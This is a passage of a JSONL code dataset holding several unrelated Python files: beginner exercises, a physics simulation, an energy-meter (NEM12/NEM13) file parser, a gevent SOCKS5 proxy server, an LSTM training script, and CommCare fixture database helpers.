delimiter='\\t')\n for row in reader:\n print(row)\n print(len(row))\n args= list(row.values())\n print(args)\n \n","sub_path":"Assignment 6- Object-oriented program/Student assignments/RuthMisir_Hw6_BMSE/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"432743096","text":"# -*- coding: utf-8 
-*-\r\n\"\"\"\r\nCreated on Tue May 29 12:48:10 2018\r\n\r\n@author: ibras\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n# read train data\r\npath = 'C:/Users/ibras/AnacondaProjects/Kaggle/Titanic/train.csv'\r\ntraindf = pd.read_csv(path)\r\ntraindf.columns = map(str.lower, traindf.columns)\r\n\r\nprint(traindf.describe()) # some values are NaN or 0 where they shouldn't be\r\n# age, cabin and embarked columns have null values, fare is 0 for some\r\n \r\nprint(traindf[['age','fare']][traindf.fare<1]) # check whether a zero fare relates to age\r\n# zero fares did not relate to age (i.e. not babies), so most likely a mistake\r\n# apply average fare for the class instead of 0\r\n# first set 0 to nan to calculate means\r\ntraindf.fare = traindf.fare.map(lambda x: np.nan if x==0 else x)\r\n#calculate the mean fare for each class\r\nfare_means = traindf.pivot_table('fare', index='pclass', aggfunc='mean')\r\n\r\n ","sub_path":"titanic1.py","file_name":"titanic1.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"275614662","text":"# Find the cube root\n\nT = int(input())\nfor tc in range(1, T+1):\n    N = int(input())\n    ans = -1\n    for i in range(10**6+1):\n        if i ** 3 == N:\n            ans = i\n            break\n    print('#%d %d' % (tc, ans))","sub_path":"Python/SWEA/Code-Problem/D3/5688.py","file_name":"5688.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"228889004","text":"import matplotlib.pyplot as plt\nimport numpy as np \nimport math\nimport scipy.constants as const\n\ng = const.g\ndt = 1e-3\nv0 = 40\n\nangle = math.pi / 4\ntime = np.arange(0,10, dt)\n\ngamm = 0.005\nh = 100\n\ndef traj_fr(angle, v0):\n    vx0 = math.cos(angle)*v0 \n    vy0 = math.sin(angle)*v0 \n    x = np.zeros(len(time)) \n    y = np.zeros(len(time))\n\n    x[0],y[0] = 0,0 \n    x[1],y[1] = x[0] + vx0*(2*dt), y[0]+vy0*(2*dt) \n    i=1 \n
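    # Two-step finite-difference (Verlet-style) position update with a\n    # linear drag term: f = 0.5*gamm*(h - y[i])*dt acts as the per-step\n    # drag factor, so drag is assumed to weaken linearly with altitude\n    # and to vanish at the reference height y = h.\n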
    while y[i]>=0 and i + 1 < len(x): \n        f = 0.5 * gamm * (h - y[i]) * dt \n        x[i+1] = ((2*x[i]-x[i-1]) + (f * x[i-1])) / (1 + f) \n        y[i+1] = ((2*y[i]-y[i-1]) + (f * y[i-1]) - g*(dt**2) ) / (1 + f) \n        i = i+1 \n\n    x = x[0:i+1] \n    y = y[0:i+1] \n    return x, y, (dt*i), x[i]\n\nx,y,duration,distance = traj_fr(angle,v0) \nprint ('Distance: ' , distance)\nprint ('Duration: ' , duration) \nn = 5 \nangles = np.linspace(0, math.pi/2, n) \nprint ('Angles: ' , angles) \nmaxrange = np.zeros(n)\n\n\nfor i in range(n): \n    x,y,duration,maxrange[i] = traj_fr(angles[i], v0) \n    # print(x)\n\nangles = angles / 2 / math.pi * 360 \nprint ('Launch Angles: ', angles)\nprint ('Optimum Angle: ', angles[np.where(maxrange==np.max(maxrange))]) \n\n# print(x)\n# print(y)\n\n# plt.plot(x,y) #quick plot of x vs y to check trajectory \n# plt.xlabel('x') \n# plt.ylabel('y')\n# plt.show()\n","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"472157159","text":"print(\"\"\"\n38. Ask the user to enter ten numeric values and sort them in ascending order, storing them in an array.\nSort each value as soon as it is entered. At the end, show the values on screen in order.\n\"\"\")\n\nvetor = list()\nfor contador in range(10):\n    numero = int(input(f'Enter number {contador + 1}: '))\n    # Count how many stored values are smaller than the new one, then\n    # insert it at that position so the list stays sorted as it is typed.\n    vez = 0\n    for num in vetor:\n        if num < numero:\n            vez += 1\n    vetor.insert(vez, numero)\n\nprint(vetor)\n","sub_path":"Seção_07/parte_1/Exercício_38.py","file_name":"Exercício_38.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"567792631","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/nemreader/nem_reader.py\n# Compiled at: 2019-10-03 03:35:40\n# Size of source mod 2**32: 12845 bytes\n\"\"\"\n    nemreader.nem_reader\n    ~~~~~\n    Read MDFF format\n\"\"\"\nimport os, csv, logging\nfrom datetime import datetime, timedelta\nimport zipfile\nfrom typing import Iterable, Any\nfrom typing import Optional, List, Dict\nfrom .nem_objects import NEMFile, HeaderRecord, NmiDetails\nfrom .nem_objects import Reading, BasicMeterData, IntervalRecord, EventRecord\nfrom .nem_objects import B2BDetails12, B2BDetails13\nlog = logging.getLogger(__name__)\n\ndef flatten_list(l: List[list]) -> list:\n    \"\"\" takes a list of lists, l, and returns a flat list\n    \"\"\"\n    return [v for inner_l in l for v in inner_l]\n\n\ndef read_nem_file(file_path: str) -> NEMFile:\n    \"\"\" Read in NEM file and return meter readings named tuple\n\n    :param file_path: The NEM file to process\n    :returns: The parsed NEMFile\n    \"\"\"\n    _, file_extension = os.path.splitext(file_path)\n    if file_extension.lower() == '.zip':\n        log.debug('Extracting zip file')\n        with zipfile.ZipFile(file_path, 'r') as archive:\n            for csv_file in archive.namelist():\n                with archive.open(csv_file) as csv_text:\n                    nmi_file = csv_text.read().decode('utf-8').splitlines()\n                    reader = csv.reader(nmi_file, delimiter=',')\n                    first_row = next(reader, None)\n                    header = parse_header_row(first_row, file_name=csv_file)\n                    if header.version_header == 'NEM12':\n                        return parse_nem12_rows(reader,\n                          header=header, file_name=csv_file)\n                    return parse_nem13_rows(reader,\n                      header=header, file_name=csv_file)\n\n    with open(file_path) as nmi_file:\n        return parse_nem_file(nmi_file)\n\n\ndef parse_nem_file(nem_file) -> NEMFile:\n    \"\"\" Parse NEM file and return meter readings named tuple \"\"\"\n    reader = csv.reader(nem_file, delimiter=',')\n    first_row = next(reader, None)\n    header = parse_header_row(first_row, file_name=nem_file.name)\n    if header.version_header == 'NEM12':\n        return parse_nem12_rows(reader, header=header, file_name=nem_file)\n    return parse_nem13_rows(reader, header=header, file_name=nem_file)\n\n\ndef parse_header_row(row: List[Any], file_name=None) -> HeaderRecord:\n    \"\"\" Parse first row of NEM file \"\"\"\n    record_indicator = int(row[0])\n    if record_indicator != 100:\n        raise ValueError('NEM Files must start with a 100 row')\n    header = parse_100_row(row, file_name)\n    if header.version_header not in ('NEM12', 'NEM13'):\n        raise ValueError('Invalid NEM version {}'.format(header.version_header))\n    log.debug('Parsing %s file %s ...', header.version_header, file_name)\n    return header\n\n\ndef parse_100_row(row: List[Any], file_name: str) -> HeaderRecord:\n    \"\"\" Parse header record (100).\n
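\n    An example 100 row (format assumed from the field order used below):\n        100,NEM12,200506081149,UNITEDDP,NEMMCO\n    i.e. version header, file creation datetime, from-participant and\n    to-participant.\n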
    \"\"\"\n    return HeaderRecord(row[1], parse_datetime(row[2]), row[3], row[4], file_name)\n\n\ndef parse_nem12_rows(nem_list: Iterable, header: HeaderRecord, file_name=None) -> NEMFile:\n    \"\"\" Parse NEM row iterator and return meter readings named tuple \"\"\"\n    readings = {}\n    trans = {}\n    nmi_d = None\n    for row in nem_list:\n        record_indicator = int(row[0])\n        if record_indicator == 900:\n            for nmi in readings:\n                for suffix in readings[nmi]:\n                    readings[nmi][suffix] = flatten_list(readings[nmi][suffix])\n\n            break\n        elif record_indicator == 200:\n            try:\n                nmi_details = parse_200_row(row)\n            except ValueError:\n                log.error('Error parsing 200 row:')\n                log.error(row)\n                raise\n\n            nmi_d = nmi_details\n            if nmi_d.nmi not in readings:\n                readings[nmi_d.nmi] = {}\n            if nmi_d.nmi_suffix not in readings[nmi_d.nmi]:\n                readings[nmi_d.nmi][nmi_d.nmi_suffix] = []\n            if nmi_d.nmi not in trans:\n                trans[nmi_d.nmi] = {}\n            if nmi_d.nmi_suffix not in trans[nmi_d.nmi]:\n                trans[nmi_d.nmi][nmi_d.nmi_suffix] = []\n        elif record_indicator == 300:\n            num_intervals = int(1440 / nmi_d.interval_length)\n            assert len(row) > num_intervals, 'Incomplete 300 Row in {}'.format(file_name)\n            interval_record = parse_300_row(row, nmi_d.interval_length, nmi_d.uom, nmi_d.meter_serial_number)\n            readings[nmi_d.nmi][nmi_d.nmi_suffix].append(interval_record.interval_values)\n        elif record_indicator == 400:\n            event_record = parse_400_row(row)\n            readings[nmi_d.nmi][nmi_d.nmi_suffix][-1] = update_reading_events(readings[nmi_d.nmi][nmi_d.nmi_suffix][-1], event_record)\n        elif record_indicator == 500:\n            b2b_details = parse_500_row(row)\n            trans[nmi_d.nmi][nmi_d.nmi_suffix].append(b2b_details)\n        else:\n            log.warning('Record indicator %s not supported and was skipped', record_indicator)\n\n    return NEMFile(header, readings, trans)\n\n\ndef parse_nem13_rows(nem_list: Iterable, header: HeaderRecord, file_name=None) -> NEMFile:\n    \"\"\" Parse NEM row iterator and return meter readings named tuple \"\"\"\n    readings = {}\n    trans = {}\n    nmi_d = None\n    for row in nem_list:\n        record_indicator = int(row[0])\n        if record_indicator == 900:\n            for nmi in readings:\n                for suffix in readings[nmi]:\n                    readings[nmi][suffix] = flatten_list(readings[nmi][suffix])\n\n            break\n        elif record_indicator == 550:\n            b2b_details = parse_550_row(row)\n            trans[nmi_d.nmi][nmi_d.nmi_suffix].append(b2b_details)\n        elif record_indicator == 250:\n            basic_data = parse_250_row(row)\n            reading = calculate_manual_reading(basic_data)\n            nmi_d = basic_data\n            if basic_data.nmi not in readings:\n                readings[nmi_d.nmi] = {}\n            if nmi_d.nmi_suffix not in readings[nmi_d.nmi]:\n                readings[nmi_d.nmi][nmi_d.nmi_suffix] = []\n            if nmi_d.nmi not in trans:\n                trans[nmi_d.nmi] = {}\n            if nmi_d.nmi_suffix not in trans[nmi_d.nmi]:\n                trans[nmi_d.nmi][nmi_d.nmi_suffix] = []\n            readings[nmi_d.nmi][nmi_d.nmi_suffix].append([reading])\n        else:\n            log.warning('Record indicator %s not supported and was skipped', record_indicator)\n\n    return NEMFile(header, readings, trans)\n\n\ndef calculate_manual_reading(basic_data: BasicMeterData) -> Reading:\n    \"\"\" Calculate the interval between two manual readings \"\"\"\n    t_start = basic_data.previous_register_read_datetime\n    t_end = basic_data.current_register_read_datetime\n    read_start = basic_data.previous_register_read\n    read_end = basic_data.current_register_read\n    value = basic_data.quantity\n    meter_serial_number = basic_data.meter_serial_number\n    uom = basic_data.uom\n    quality_method = basic_data.current_quality_method\n    return Reading(t_start, t_end, 
value, uom, meter_serial_number, quality_method, '', '', read_start, read_end)\n\n\ndef parse_200_row(row: list) -> NmiDetails:\n \"\"\" Parse NMI data details record (200) \"\"\"\n next_read = None\n if len(row) > 9:\n next_read = parse_datetime(row[9])\n return NmiDetails(row[1], row[2], row[3], row[4], row[5], row[6], row[7], int(row[8]), next_read)\n\n\ndef parse_250_row(row: list) -> BasicMeterData:\n \"\"\" Parse basic meter data record (250) \"\"\"\n return BasicMeterData(row[1], row[2], row[3], row[4], row[5], row[6], row[7], float(row[8]), parse_datetime(row[9]), row[10], row[11], row[12], float(row[13]), parse_datetime(row[14]), row[15], row[16], row[17], float(row[18]), row[19], row[20], parse_datetime(row[21]), parse_datetime(row[22]))\n\n\ndef parse_300_row(row: list, interval: int, uom: str, meter_serial_number: str) -> IntervalRecord:\n \"\"\" Interval data record (300) \"\"\"\n num_intervals = int(1440 / interval)\n interval_date = parse_datetime(row[1])\n last_interval = 2 + num_intervals\n quality_method = row[last_interval]\n reason_code = row[(last_interval + 1)]\n reason_desc = row[(last_interval + 2)]\n update_datetime = parse_datetime(row[(last_interval + 3)])\n msats_load_datatime = parse_datetime(row[(last_interval + 4)])\n interval_values = parse_interval_records(row[2:last_interval], interval_date, interval, uom, quality_method, meter_serial_number, reason_code, reason_desc)\n return IntervalRecord(interval_date, interval_values, quality_method, meter_serial_number, reason_code, reason_desc, update_datetime, msats_load_datatime)\n\n\ndef parse_interval_records(interval_record, interval_date, interval, uom, quality_method, meter_serial_number, event_code: str='', event_desc: str='') -> List[Reading]:\n \"\"\" Convert interval values into tuples with datetime\n \"\"\"\n interval_delta = timedelta(minutes=interval)\n return [Reading(t_start=(interval_date + i * interval_delta), t_end=(interval_date + i * interval_delta + interval_delta), read_value=(parse_reading(val)), uom=uom, quality_method=quality_method, meter_serial_number=meter_serial_number, event_code=event_code, event_desc=event_desc, read_start=None, read_end=None) for i, val in enumerate(interval_record)]\n\n\ndef parse_reading(val: str) -> Optional[float]:\n \"\"\" Convert reading value to float (if possible) \"\"\"\n try:\n return float(val)\n except ValueError:\n log.warning('Reading of \"%s\" is not a number', val)\n return\n\n\ndef parse_400_row(row: list) -> tuple:\n \"\"\" Interval event record (400) \"\"\"\n return EventRecord(int(row[1]), int(row[2]), row[3], row[4], row[5])\n\n\ndef update_reading_events(readings, event_record):\n \"\"\" Updates readings from a 300 row to reflect any events found in a\n subsequent 400 row\n \"\"\"\n for i in range(event_record.start_interval - 1, event_record.end_interval):\n readings[i] = Reading(t_start=(readings[i].t_start),\n t_end=(readings[i].t_end),\n read_value=(readings[i].read_value),\n uom=(readings[i].uom),\n meter_serial_number=(readings[i].meter_serial_number),\n quality_method=(event_record.quality_method),\n event_code=(event_record.reason_code),\n event_desc=(event_record.reason_description),\n read_start=(readings[i].read_start),\n read_end=(readings[i].read_end))\n\n return readings\n\n\ndef parse_500_row(row: list) -> tuple:\n \"\"\" Parse B2B details record \"\"\"\n return B2BDetails12(row[1], row[2], row[3], row[4])\n\n\ndef parse_550_row(row: list) -> tuple:\n \"\"\" Parse B2B details record \"\"\"\n return B2BDetails13(row[1], row[2], 
row[3], row[4])\n\n\ndef parse_datetime(record: str) -> Optional[datetime]:\n \"\"\" Parse a datetime string into a python datetime object \"\"\"\n format_strings = {8:'%Y%m%d', \n 12:'%Y%m%d%H%M', 14:'%Y%m%d%H%M%S'}\n if record == '':\n return\n return datetime.strptime(record.strip(), format_strings[len(record.strip())])","sub_path":"pycfiles/nemreader-0.4-py3.7/nem_reader.cpython-37.py","file_name":"nem_reader.cpython-37.py","file_ext":"py","file_size_in_byte":11277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"437768907","text":"import gevent\nfrom gevent import monkey\nfrom gevent.pool import Pool\nfrom gevent import select\nfrom gevent.server import StreamServer\nfrom gevent import socket\n\n\nmonkey.patch_all()\n\nBUFFER = 4096\nSOCK_V5 = 5\nRSV = 0\nATYP_IP_V4 = 1\nATYP_DOMAINNAME = 3\nCMD_CONNECT = 1\nIMPLEMENTED_METHODS = (2, 0)\n\n\nclass SockV5Server(object):\n\n def __init__(self, port=1080):\n self.port = port\n self.pool = Pool(1000)\n self.server = StreamServer(('0.0.0.0', self.port),\n self.handler)\n\n def close_sock_and_exit(self, client_sock=None, server_sock=None):\n if client_sock:\n if not client_sock.closed:\n client_sock.close()\n\n if server_sock:\n if not server_sock.closed:\n server_sock.close()\n\n g = gevent.getcurrent()\n g.kill()\n\n def process_version_and_auth(self, client_sock):\n \"\"\"Request format:\n\n +----+----------+----------+\n |VER | NMETHODS | METHODS |\n +----+----------+----------+\n | 1 | 1 | 1 to 255 |\n +----+----------+----------+\n\n Response format:\n\n +----+--------+\n |VER | METHOD |\n +----+--------+\n | 1 | 1 |\n +----+--------+\n\n The values currently defined for METHOD are:\n\n o X'00' NO AUTHENTICATION REQUIRED\n o X'01' GSSAPI\n o X'02' USERNAME/PASSWORD\n o X'03' to X'7F' IANA ASSIGNED\n o X'80' to X'FE' RESERVED FOR PRIVATE METHODS\n o X'FF' NO ACCEPTABLE METHODS\n \"\"\"\n\n recv = client_sock.recv(BUFFER)\n if ord(recv[0]) != SOCK_V5:\n self.close_sock_and_exit(client_sock)\n\n method = None\n num_methods = ord(recv[1])\n methods = [ord(recv[i + 2]) for i in range(num_methods)]\n for imp_method in IMPLEMENTED_METHODS:\n if imp_method in methods:\n method = imp_method\n break\n\n if method is None:\n self.close_sock_and_exit(client_sock)\n\n send_msg = '\\x05' + chr(method)\n client_sock.send(send_msg)\n\n # if method:\n # self.process_authentication()\n #\n # NOTE(deliang), only NO AUTHENTICATION REQUIRED has been implemented\n # here. 
The USERNAME/PASSWORD method may be added later.\n        #\n        # Username/Password Authentication for SOCKS V5\n        # https://tools.ietf.org/html/rfc1929\n\n    def process_sock_request(self, client_sock):\n        \"\"\"The SOCKS request is formed as follows:\n\n        +----+-----+-------+------+----------+----------+\n        |VER | CMD |  RSV  | ATYP | DST.ADDR | DST.PORT |\n        +----+-----+-------+------+----------+----------+\n        | 1  |  1  | X'00' |  1   | Variable |    2     |\n        +----+-----+-------+------+----------+----------+\n\n        o  VER    protocol version: X'05'\n        o  CMD\n           o  CONNECT X'01'\n           o  BIND X'02'\n           o  UDP ASSOCIATE X'03'\n        o  RSV    RESERVED\n        o  ATYP   address type of following address\n           o  IP V4 address: X'01'\n           o  DOMAINNAME: X'03'\n           o  IP V6 address: X'04'\n        o  DST.ADDR  desired destination address\n        o  DST.PORT  desired destination port in network octet order\n\n\n        The SOCKS reply is formed as follows:\n\n        +----+-----+-------+------+----------+----------+\n        |VER | REP |  RSV  | ATYP | BND.ADDR | BND.PORT |\n        +----+-----+-------+------+----------+----------+\n        | 1  |  1  | X'00' |  1   | Variable |    2     |\n        +----+-----+-------+------+----------+----------+\n\n        o  VER    protocol version: X'05'\n        o  REP    Reply field:\n           o  X'00' succeeded\n           o  X'01' general SOCKS server failure\n           o  X'02' connection not allowed by ruleset\n           o  X'03' Network unreachable\n           o  X'04' Host unreachable\n           o  X'05' Connection refused\n           o  X'06' TTL expired\n           o  X'07' Command not supported\n           o  X'08' Address type not supported\n           o  X'09' to X'FF' unassigned\n        o  RSV    RESERVED\n        o  ATYP   address type of following address\n           o  IP V4 address: X'01'\n           o  DOMAINNAME: X'03'\n           o  IP V6 address: X'04'\n        o  BND.ADDR  server bound address\n        o  BND.PORT  server bound port in network octet order\n        \"\"\"\n\n        recv = client_sock.recv(BUFFER)\n        if ord(recv[0]) != SOCK_V5 or ord(recv[2]) != RSV:\n            self.close_sock_and_exit(client_sock)\n\n        addr_type = ord(recv[3])\n        if addr_type == ATYP_IP_V4:\n            addr = socket.inet_ntoa(recv[4:8])\n        elif addr_type == ATYP_DOMAINNAME:\n            addr_len = ord(recv[4])\n            addr = socket.gethostbyname(recv[5:5 + addr_len])\n        else:\n            # only ipv4 addr or domain name is supported.\n            self.close_sock_and_exit(client_sock)\n\n        port = ord(recv[-2]) * 256 + ord(recv[-1])\n\n        cmd = ord(recv[1])\n        if cmd == CMD_CONNECT:\n            # Only connect cmd is supported.\n            server_sock = self.connect_target_server_and_reply(client_sock,\n                                                               addr, port, cmd)\n        else:\n            self.close_sock_and_exit(client_sock)\n\n        return server_sock\n
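\n    # Editorial example (added; not in the original): a typical CONNECT request\n    # for 127.0.0.1:80 is the 10 bytes\n    #\n    #     \\x05 \\x01 \\x00 \\x01 \\x7f\\x00\\x00\\x01 \\x00\\x50\n    #     VER  CMD  RSV  ATYP  DST.ADDR        DST.PORT\n    #\n    # so ord(recv[3]) == 1 selects the IPv4 branch and the port decodes as\n    # 0 * 256 + 80.\n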
\n    def connect_target_server_and_reply(self, client_sock, addr, port, cmd):\n        sock_name = client_sock.getsockname()\n        server_hex_addr = socket.inet_aton(sock_name[0])\n        server_hex_port = self.port_to_hex_string(sock_name[1])\n        server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n        try:\n            server_sock.connect((addr, port))\n            send_msg = '\\x05\\x00\\x00\\x01' + server_hex_addr + server_hex_port\n            client_sock.send(send_msg)\n        except Exception:\n            send_msg = '\\x05\\x01\\x00\\x01' + server_hex_addr + server_hex_port\n            client_sock.send(send_msg)\n            self.close_sock_and_exit(client_sock)\n\n        return server_sock\n\n    def piping_client_and_target(self, client_sock, server_sock):\n        inputs = [client_sock, server_sock]\n        while True:\n            try:\n                in_ready, out_ready, ex_ready = select.select(inputs, [], [])\n                for sock in in_ready:\n                    if sock == client_sock:\n                        self.recv_and_send_msg(client_sock, server_sock)\n                    elif sock == server_sock:\n                        self.recv_and_send_msg(server_sock, client_sock)\n            except Exception:\n                self.close_sock_and_exit(client_sock, server_sock)\n\n    def recv_and_send_msg(self, recv_sock, send_sock):\n        # recv() is a blocking call; it returns '' when the remote end has closed.\n        msg = recv_sock.recv(BUFFER)\n        if msg == '':\n            self.close_sock_and_exit(recv_sock, send_sock)\n\n        send_sock.sendall(msg)\n\n    def port_to_hex_string(self, int_port):\n        port_hex_string = chr(int_port // 256) + chr(int_port % 256)\n        return port_hex_string\n\n    def handler(self, client_sock, address):\n        # -----------------------------------------------#\n        # SOCKS Protocol Version 5                       |\n        # https://www.ietf.org/rfc/rfc1928.txt           |\n        # -----------------------------------------------#\n\n        self.process_version_and_auth(client_sock)\n        server_sock = self.process_sock_request(client_sock)\n        self.piping_client_and_target(client_sock, server_sock)\n\n    def serve_forever(self):\n        self.server.serve_forever()\n\n\nif '__main__' == __name__:\n    sock_v5_server = SockV5Server(1080)\n    sock_v5_server.serve_forever()\n","sub_path":"python/funny_talk/ss5/ss5/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":8033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"51195670","text":"from __future__ import print_function\r\nimport sys\r\nimport codecs\r\nimport os\r\n\r\nimport numpy as np\r\n\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Activation\r\nfrom keras.layers.recurrent import LSTM\r\nfrom keras.optimizers import RMSprop\r\n\r\nimport MeCab\r\n\r\n\r\nn_hidden_neurons = 128\r\nn_batch_size = 128\r\nn_sequence = 12\r\nn_step = 3\r\nn_epochs = 1\r\n\r\ntextfile = 'data/yumeno.txt'\r\n\r\nresult_dir = 'lstm_results_bs128_Sq12_ma'\r\nif not os.path.exists(result_dir):\r\n    os.mkdir(result_dir)\r\n\r\n\r\n# input data\r\ndef load_data(filename):\r\n    vocab = {}\r\n    words = []\r\n    mecab = MeCab.Tagger('-Owakati')\r\n    with codecs.open(filename, 'rb', 'utf-8') as file:\r\n        lines = file.readlines()\r\n        w = [mecab.parse(line.replace('\\n', '').replace('\\r', '')).split(' ') for line in lines]\r\n        words = [i for inner in w for i in inner]\r\n\r\n    chars = sorted(list(set(words)))\r\n    char_indices = {c: i for i, c in enumerate(chars)}\r\n    indices_char = {i: c for i, c in enumerate(chars)}\r\n    return words, chars, char_indices, indices_char\r\n\r\n\r\ndef vectorize(words, chars, char_indices):\r\n    sentences = []\r\n    next_chars = []\r\n    for i in range(0, len(words) - n_sequence, n_step):\r\n        sentences.append(words[i:i+n_sequence])\r\n        next_chars.append(words[i+n_sequence])\r\n\r\n    # vectorise into one-hot arrays\r\n    print(len(sentences), n_sequence, len(chars), '=', len(sentences) * n_sequence * len(chars))\r\n    X = np.zeros((len(sentences), n_sequence, len(chars)), dtype=bool)\r\n    y = np.zeros((len(sentences), len(chars)), dtype=bool)\r\n    for i, sentence in enumerate(sentences):\r\n        for t, char in enumerate(sentence):\r\n            X[i, t, char_indices[char]] = 1\r\n        y[i, char_indices[next_chars[i]]] = 1\r\n    return X, y\r\n\r\n\r\ndef create_model(n_sequence, n_vocabs, n_hidden_neurons):\r\n    \"\"\"\r\n    n_vocabs: vocabulary size\r\n    \"\"\"\r\n    model = Sequential()\r\n    model.add(LSTM(n_hidden_neurons, input_shape=(n_sequence, n_vocabs)))\r\n    model.add(Dense(n_vocabs))\r\n    model.add(Activation('softmax'))\r\n\r\n    return model\r\n\r\n\r\ndef save_model(model, path, name):\r\n    \"\"\"\r\n    Save the trained model, its weights and its history.\r\n    \"\"\"\r\n    model_json = model.to_json()\r\n    with open(os.path.join(path, name + '.json'), 'w') as json_file:\r\n        json_file.write(model_json)\r\n    model.save_weights(os.path.join(path, name + '.h5'))\r\n
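\r\n\r\n# Editorial sketch (added; not from the original script): greedy next-word\r\n# prediction with the trained network, assuming model, chars and char_indices\r\n# from above are in scope and seed is a list of n_sequence known words:\r\n#\r\n#     x = np.zeros((1, n_sequence, len(chars)), dtype=bool)\r\n#     for t, word in enumerate(seed):\r\n#         x[0, t, char_indices[word]] = 1\r\n#     next_word = chars[int(np.argmax(model.predict(x)[0]))]\r\n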
\r\n\r\nwords, chars, char_indices, _ = load_data(textfile)\r\n\r\nX, y = vectorize(words, chars, char_indices)\r\n\r\n\r\nmodel = create_model(n_sequence, len(chars), n_hidden_neurons)\r\noptimizer = RMSprop(lr=0.01)\r\nmodel.compile(loss=\"categorical_crossentropy\", optimizer=optimizer, metrics=['accuracy'])\r\n\r\nmodel.fit(X, y, batch_size=n_batch_size, epochs=n_epochs, verbose=1)\r\n\r\n\r\n# save the model\r\nsave_model(model, result_dir, \"model\")\r\n","sub_path":"docgen_train.py","file_name":"docgen_train.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"346588230","text":"# -*- coding: utf-8 -*-\n\"\"\"\n    Description: binary search\n\"\"\"\n\n\ndef binary_search(sequence, key):\n    \"\"\"sequence must be a sorted sequence\"\"\"\n    low = 0\n    high = len(sequence) - 1\n    time = 0\n    while low <= high:\n        time += 1\n        mid = (low + high) // 2\n        if key < sequence[mid]:\n            high = mid - 1\n\n        elif key > sequence[mid]:\n            low = mid + 1\n        else:\n            print(\"times: \", time)\n            return mid\n\n    print(\"times: \", time)\n    return None\n
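\n\n# Editorial example (added): with the sorted list used below,\n# binary_search([1, 5, 7, 8, 22, 54, 99, 123, 200, 222, 444], 99) returns 6\n# (the index of 99) and returns None for keys that are absent.\n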
\n\nif __name__ == '__main__':\n    LIST = [1, 5, 7, 8, 22, 54, 99, 123, 200, 222, 444]\n    result = binary_search(LIST, 99)\n    print(result)\n","sub_path":"Data_Structures-and-Algorithm/algorithm_code/search/binary_search/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"638879324","text":"from dimagi.utils.couch.database import iter_bulk_delete\n\nfrom corehq.util.couch_helpers import paginate_view\nfrom corehq.util.quickcache import quickcache\nfrom corehq.util.test_utils import unit_testing_only\n\n\ndef count_fixture_data_types(domain):\n    from corehq.apps.fixtures.models import FixtureDataType\n    num_fixtures = FixtureDataType.get_db().view(\n        'by_domain_doc_type_date/view',\n        startkey=[domain, 'FixtureDataType'],\n        endkey=[domain, 'FixtureDataType', {}],\n        reduce=True,\n        group_level=2,\n    ).first()\n    return num_fixtures['value'] if num_fixtures is not None else 0\n\n\n@quickcache(['domain'], timeout=30 * 60)\ndef get_fixture_data_types(domain):\n    from corehq.apps.fixtures.models import FixtureDataType\n    return list(FixtureDataType.view(\n        'by_domain_doc_type_date/view',\n        endkey=[domain, 'FixtureDataType'],\n        startkey=[domain, 'FixtureDataType', {}],\n        reduce=False,\n        include_docs=True,\n        descending=True,\n    ))\n\n\ndef get_fixture_data_type_by_tag(domain, tag):\n    data_types = get_fixture_data_types(domain)\n    for data_type in data_types:\n        if data_type.tag == tag:\n            return data_type\n    return None\n\n\n@quickcache(['domain', 'data_type_id'], timeout=60 * 60, memoize_timeout=60, skip_arg='bypass_cache')\ndef get_fixture_items_for_data_type(domain, data_type_id, bypass_cache=False):\n    from corehq.apps.fixtures.models import FixtureDataItem\n    return list(FixtureDataItem.view(\n        'fixtures/data_items_by_domain_type',\n        startkey=[domain, data_type_id],\n        endkey=[domain, data_type_id, {}],\n        reduce=False,\n        include_docs=True,\n    ))\n\n\ndef delete_fixture_items_for_data_type(domain, data_type_id):\n    from corehq.apps.fixtures.models import FixtureDataItem\n    iter_bulk_delete(FixtureDataItem.get_db(), [\n        i[\"_id\"] for i in iter_fixture_items_for_data_type(domain, data_type_id)\n    ])\n\n\ndef iter_fixture_items_for_data_type(domain, data_type_id):\n    from corehq.apps.fixtures.models import FixtureDataItem\n    for row in paginate_view(\n            FixtureDataItem.get_db(),\n            'fixtures/data_items_by_domain_type',\n            chunk_size=1000,\n            startkey=[domain, data_type_id],\n            endkey=[domain, data_type_id, {}],\n            reduce=False,\n            include_docs=True\n    ):\n        yield FixtureDataItem.wrap(row['doc'])\n\n\ndef count_fixture_items(domain, data_type_id):\n    from corehq.apps.fixtures.models import FixtureDataItem\n    return FixtureDataItem.view(\n        'fixtures/data_items_by_domain_type',\n        startkey=[domain, data_type_id],\n        endkey=[domain, data_type_id, {}],\n        reduce=True,\n    ).first()['value']\n\n\ndef get_owner_ids_by_type(domain, owner_type, data_item_id):\n    from corehq.apps.fixtures.models import FixtureOwnership\n    assert owner_type in FixtureOwnership.owner_type.choices, \\\n        \"Owner type must be in {}\".format(FixtureOwnership.owner_type.choices)\n    return FixtureOwnership.get_db().view(\n        'fixtures/ownership',\n        key=[domain, '{} by data_item'.format(owner_type), data_item_id],\n        reduce=False,\n        wrapper=lambda r: 